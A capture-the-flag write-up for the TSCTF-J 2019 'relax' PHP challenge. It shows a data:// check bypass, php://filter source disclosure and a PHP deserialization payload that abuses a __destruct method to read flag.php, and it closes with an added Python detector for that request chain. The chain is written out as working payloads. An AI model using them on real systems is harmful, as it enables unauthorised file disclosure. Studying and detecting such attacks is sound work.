【TSCTF-J 2019】relax

    Tech  2022-07-11

    Challenge URL: http://ctf.merak.codes

    Opening it gives a site with nothing useful on it, so scan it. Visiting /robots.txt reveals three files:

    User-agent: *
    Disallow: /relax.php
    Disallow: /heicore.php
    Disallow: /flag.php

    Only /relax.php has anything in it. Viewing its source shows aaencode-obfuscated JavaScript; run it straight in the browser console, or decode it online at https://www.qtool.net/decode. Tidied up, it gives:

    $_   = $_GET['pw'];
    $__  = $_GET['file'];
    $___ = $_GET['(><)'];
    if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {
        echo '<img src="./images/13.jpg" alt=""><br>';
        include($__);
    } else {
        echo '<img src="./images/1.gif" alt="">';
    }

    The check file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three" can be bypassed with the data:// wrapper. Below it there is include($__); I tried file=flag.php to include the flag, but the page only echoed "It's not that simple". I was too naive! So I used the php://filter wrapper to read the source of heicore.php and relax.php instead. heicore.php:

    <?php
    class Heicore {
        public $file;
        public function __destruct() {
            if (isset($this->file)) {
                echo file_get_contents($this->file);
            }
        }
    }

    relax.php:

    <?php
    error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);
    $_   = $_GET['pw'];
    $__  = $_GET['file'];
    $___ = $_GET['(><)'];
    if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {
        echo '<img src="./images/13.jpg" alt=""><br>';
        if (preg_match("/flag/i", $__)) {      // blacklist on the include target only
            echo "It's not that simple";
            exit();
        } else {
            include($__);
            unserialize($___);                 // user-controlled data reaches unserialize()
        }
    } else {
        echo '<img src="./images/1.gif" alt="">';
    }
    ?>

    Now we finally have the complete source, and it really does filter "flag". The destructor in heicore.php echoes $file, so include heicore.php and point its $file member at flag.php; since unserialize() is called on our input, deserialization lets us trigger the magic method __destruct() and print the flag:

    <?php
    class Heicore {
        public $file = 'php://filter/read=convert.base64-encode/resource=flag.php';
    }
    $a = new Heicore();
    $b = serialize($a);
    echo $b;
    # O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

    The constructed payload:

    ?pw=data:text/plain,Two%20thousand%20three%20hundred%20and%20thirty-three&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

    Base64-decode the output to get the flag.
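    As an added example (not the writeup's or the challenge's own code), here is a small Python checker that looks for the three parts of this chain in a single request: a data: wrapper in pw, a serialized object handed to unserialize(), and a php://filter wrapper inside that object's property. The minimal serialize() parser and the finding texts are my own; the sample URL is the payload above with the challenge host prepended.

```python
# Added example (not the writeup's code): flag the relax.php chain in one request: a data:
# wrapper in pw, serialized PHP data in (><), a php://filter wrapper in the object's property.
import re
from urllib.parse import unquote, urlsplit

WRAPPER_RE = re.compile(r"^(?:php|phar|data|expect)://|^data:", re.I)

def php_unserialize(s, pos=0):
    """Parse a subset of serialize() output (i, s, a, O; ASCII only) at pos.
    Objects come back as (class, props), arrays as dict. Returns (value, next_pos)."""
    t = s[pos]
    if t == "i":                                    # i:42;
        end = s.index(";", pos)
        return int(s[pos + 2:end]), end + 1
    if t == "s":                                    # s:<len>:"<bytes>";
        colon = s.index(":", pos + 2)
        n, start = int(s[pos + 2:colon]), colon + 2
        return s[start:start + n], start + n + 2    # skip closing quote and ';'
    if t in "aO":                                   # a:<n>:{..}  O:<len>:"<class>":<n>:{..}
        p, name = pos + 2, None
        if t == "O":
            colon = s.index(":", p)
            n = int(s[p:colon])
            name, p = s[colon + 2:colon + 2 + n], colon + 2 + n + 2
        count_end = s.index(":", p)
        count, p, members = int(s[p:count_end]), count_end + 2, {}
        for _ in range(count):
            key, p = php_unserialize(s, p)
            members[key], p = php_unserialize(s, p)
        return ((name, members) if name else members), p + 1   # skip '}'
    raise ValueError(f"unsupported serialize() type {t!r} at {pos}")

def analyze_request(url):
    """Return findings for one request URL; empty list when nothing matches."""
    findings = []
    for pair in urlsplit(url).query.split("&"):
        key, _, val = (unquote(x) for x in pair.partition("="))
        if WRAPPER_RE.match(val):
            findings.append(f"{key}: stream wrapper {val.split(':', 1)[0]}: in parameter")
        if not re.match(r"[aO]:\d+:", val):         # only serialized data matters to unserialize()
            continue
        obj, _ = php_unserialize(val)               # malformed input raises; wrap if used on logs
        if isinstance(obj, tuple):                  # object injection: class plus its props
            findings.append(f"{key}: serialized object of class {obj[0]}")
            findings += [f"{key}: property {k} carries wrapper {v}"
                         for k, v in obj[1].items() if isinstance(v, str) and WRAPPER_RE.match(v)]
    return findings

# Constructed sample: the writeup's payload against the challenge host, percent-encoded as a browser would send it.
SAMPLE = ("http://ctf.merak.codes/relax.php?pw=data:text/plain,Two%20thousand%20three%20hundred%20and%20thirty-three"
          "&file=heicore.php&(><)=O:7:%22Heicore%22:1:%7Bs:4:%22file%22;s:57:%22php://filter/read=convert.base64-encode/resource=flag.php%22;%7D")
```

    Running analyze_request(SAMPLE) yields one finding per ingredient; a request like ?pw=x&file=index.php yields none.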
